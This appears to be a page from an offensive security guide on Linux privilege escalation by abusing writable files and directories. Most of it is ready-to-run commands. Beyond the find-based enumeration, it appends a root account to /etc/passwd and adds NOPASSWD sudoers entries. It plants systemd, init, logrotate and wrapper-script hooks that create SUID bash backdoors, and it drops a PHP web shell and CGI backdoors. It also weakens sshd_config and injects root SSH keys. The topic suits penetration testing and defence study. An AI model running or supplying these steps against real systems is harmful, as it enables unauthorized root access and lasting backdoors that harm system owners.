This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Writable files and directories abuse

Understanding Writable Files and Directories Exploitation

What Makes Writable Files Dangerous

Writable files and directories can be exploited when they contain configuration data, scripts, or other resources that privileged processes read or execute. By modifying these files, attackers can alter system behavior, inject malicious code, or escalate privileges through legitimate system processes that trust the modified content.

The Attack Principle: Exploit scenarios where:

  • Configuration files control privileged process behavior

  • Log files are processed by automated systems

  • Startup scripts and service configurations can be modified

  • Shared directories allow file replacement or injection

  • Backup files contain sensitive information or can be manipulated

Why This Works: Many services and applications read configuration files, process logs, or execute scripts with elevated privileges. If these files are writable by unprivileged users, malicious modifications can lead to privilege escalation.

Writable Files Discovery and Enumeration

Finding Writable Files and Directories

Basic Writable Discovery:

# Find world-writable files
find / -type f -perm -002 2>/dev/null

# Find world-writable directories
find / -type d -perm -002 2>/dev/null

# Find files writable by current user
find / -type f -writable 2>/dev/null

# Find directories writable by current user
find / -type d -writable 2>/dev/null

Group-Writable Discovery:

# Find group-writable files
find / -type f -perm -020 2>/dev/null

# Find files writable by specific group
find / -type f -group groupname -perm -020 2>/dev/null

# Check current user's groups
groups
id

Focused Writable Search:

# Search in common configuration directories
find /etc -writable 2>/dev/null
find /var -writable 2>/dev/null
find /opt -writable 2>/dev/null

# Search for writable files in system directories
find /usr/local -writable 2>/dev/null
find /srv -writable 2>/dev/null

High-Value Writable File Targets

Configuration File Abuse

System Configuration Files:

# Check for writable system configs
ls -la /etc/passwd /etc/shadow /etc/sudoers 2>/dev/null
ls -la /etc/crontab /etc/hosts /etc/hostname 2>/dev/null

# Find writable config files in /etc
find /etc -type f -writable 2>/dev/null | head -20

# Check service configuration directories
find /etc/systemd -writable 2>/dev/null
find /etc/init.d -writable 2>/dev/null

Application Configuration Exploitation:

# If /etc/passwd is writable (rare but critical)
echo 'hacker:x:0:0:root:/root:/bin/bash' >> /etc/passwd

# If sudoers file or sudoers.d directory is writable
echo 'username ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers
echo 'username ALL=(ALL) NOPASSWD:ALL' > /etc/sudoers.d/hacker

# If hosts file is writable
echo '127.0.0.1 trusted-domain.com' >> /etc/hosts

Service Configuration Abuse

Systemd Service Modification:

# Check for writable systemd service files
find /etc/systemd/system -writable 2>/dev/null
find /usr/lib/systemd/system -writable 2>/dev/null

# If service file is writable, modify ExecStart
echo '[Unit]
Description=Malicious Service
[Service]
Type=oneshot
ExecStart=/bin/bash -c "cp /bin/bash /tmp/service_backdoor; chmod 4755 /tmp/service_backdoor"
[Install]
WantedBy=multi-user.target' > /etc/systemd/system/malicious.service

# Reload and enable service
systemctl daemon-reload
systemctl enable malicious.service

Init Script Modification:

# If init scripts are writable
find /etc/init.d -writable 2>/dev/null

# Modify existing init script
echo 'cp /bin/bash /tmp/init_backdoor; chmod 4755 /tmp/init_backdoor' >> /etc/init.d/writable_service

Log File Abuse

Log Injection and Processing:

# Find writable log files
find /var/log -writable 2>/dev/null

# If log rotation scripts process logs
# Inject malicious content that gets executed during processing
echo '<?php system("cp /bin/bash /tmp/log_backdoor; chmod 4755 /tmp/log_backdoor"); ?>' >> /var/log/apache2/access.log

# If syslog is writable
echo 'Dec 25 12:00:00 hostname logger: `cp /bin/bash /tmp/syslog_backdoor; chmod 4755 /tmp/syslog_backdoor`' >> /var/log/syslog

Log Rotation Exploitation:

# Check logrotate configuration
find /etc/logrotate.d -writable 2>/dev/null

# If logrotate config is writable
echo '/var/log/malicious.log {
    daily
    rotate 1
    postrotate
        cp /bin/bash /tmp/logrotate_backdoor
        chmod 4755 /tmp/logrotate_backdoor
    endscript
}' > /etc/logrotate.d/malicious

Application-Specific File Abuse

Web Application Files

Web Root Modification:

# Find writable web directories
find /var/www -writable 2>/dev/null
find /usr/share/nginx -writable 2>/dev/null

# If web root is writable
echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/shell.php

# If .htaccess is writable (Apache)
echo 'Options +ExecCGI
AddHandler cgi-script .sh
<Files "shell.sh">
SetHandler cgi-script
</Files>' > /var/www/html/.htaccess

echo '#!/bin/bash
echo "Content-Type: text/html"
echo
cp /bin/bash /tmp/web_backdoor
chmod 4755 /tmp/web_backdoor' > /var/www/html/shell.sh
chmod +x /var/www/html/shell.sh

SSH Configuration Abuse

SSH Config Modification:

# Check SSH configuration files
ls -la /etc/ssh/sshd_config /etc/ssh/ssh_config
find /etc/ssh -writable 2>/dev/null

# If sshd_config is writable
echo 'PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords yes' >> /etc/ssh/sshd_config

# If authorized_keys directory is writable
mkdir -p /root/.ssh
echo 'ssh-rsa YOUR_PUBLIC_KEY_HERE' >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

Shared Directory Exploitation

Shared Application Directories

Application Data Directory Abuse:

# Find shared application directories
find /opt -type d -writable 2>/dev/null
find /usr/local -type d -writable 2>/dev/null

# If application data directory is writable
# Replace legitimate files with malicious ones
cp /opt/application/script.sh /opt/application/script.sh.bak
echo '#!/bin/bash
cp /bin/bash /tmp/app_backdoor
chmod 4755 /tmp/app_backdoor
exec /opt/application/script.sh.bak "$@"' > /opt/application/script.sh
chmod +x /opt/application/script.sh

Backup and Archive Abuse

Backup File Manipulation

Backup Directory Exploitation:

# Find backup directories
find / -type d -name "*backup*" -writable 2>/dev/null
find / -type d -name "*bak*" -writable 2>/dev/null

# If backup directory is writable
# Create malicious backup files that get restored
tar -czf /backup/malicious.tar.gz --transform 's,^,../../etc/,' /tmp/malicious_passwd

# Or replace existing backups
echo 'hacker:$6$salt$hash:0:0:root:/root:/bin/bash' > /tmp/passwd_backup
tar -czf /backup/system_backup.tar.gz /tmp/passwd_backup

Real-World Exploitation Examples

Example 1: Writable Systemd Service Directory

Discovery:

# Found writable systemd directory
find /etc/systemd/system -writable 2>/dev/null
# Output: /etc/systemd/system/multi-user.target.wants

Exploitation:

# Create malicious service
echo '[Unit]
Description=System Update Service
After=network.target

[Service]
Type=oneshot
ExecStart=/bin/bash -c "cp /bin/bash /tmp/systemd_backdoor; chmod 4755 /tmp/systemd_backdoor"
RemainAfterExit=true

[Install]
WantedBy=multi-user.target' > /etc/systemd/system/system-update.service

# Enable service
systemctl enable system-update.service

# Wait for reboot or manual service start
# Access backdoor
/tmp/systemd_backdoor -p

Example 2: Writable Log Directory

Discovery:

# Found writable log directory
find /var/log -type d -writable 2>/dev/null
# Output: /var/log/app_logs

Exploitation:

# Create malicious log file that gets processed
echo '#!/bin/bash
cp /bin/bash /tmp/log_processing_backdoor
chmod 4755 /tmp/log_processing_backdoor' > /var/log/app_logs/malicious.log

# If log rotation processes .log files as scripts
# Wait for logrotate or log processing
# Access backdoor when created
/tmp/log_processing_backdoor -p

Example 3: Writable Web Configuration

Discovery:

# Found writable web config
ls -la /etc/apache2/sites-enabled/
# Output: -rw-rw-r-- 1 root web 1234 Dec 25 12:00 000-default.conf

Exploitation:

# Modify Apache configuration
echo '<Directory "/var/www/html">
    Options +ExecCGI
    AddHandler cgi-script .cgi
</Directory>

Alias /backdoor /tmp/web_backdoor.cgi' >> /etc/apache2/sites-enabled/000-default.conf

# Create CGI backdoor
echo '#!/bin/bash
echo "Content-Type: text/html"
echo
cp /bin/bash /tmp/apache_backdoor
chmod 4755 /tmp/apache_backdoor
echo "Backdoor created"' > /tmp/web_backdoor.cgi
chmod +x /tmp/web_backdoor.cgi

# Restart Apache (if possible) or wait for reload
systemctl reload apache2

Key Operational Considerations

Success Indicators

  • Writable configuration files discovered in critical directories

  • Service configurations successfully modified

  • Log processing systems accepting malicious input

  • Privilege escalation achieved through file modification

Common Failure Points

  • Proper file permissions preventing write access

  • File integrity monitoring detecting modifications

  • Service validation rejecting malformed configurations

  • Automated restoration reverting file changes

Exploitation Notes

  • Development environments often have relaxed file permissions

  • Custom applications may create writable config files

  • Backup directories frequently overlooked in permission audits

  • Log directories sometimes writable for application convenience

Writable files and directories abuse is particularly effective in environments where file permissions are not strictly controlled, offering multiple paths to privilege escalation and persistence.

PreviousEnvironment variable exploitationNextContainer escape techniques

Last updated

Was this helpful?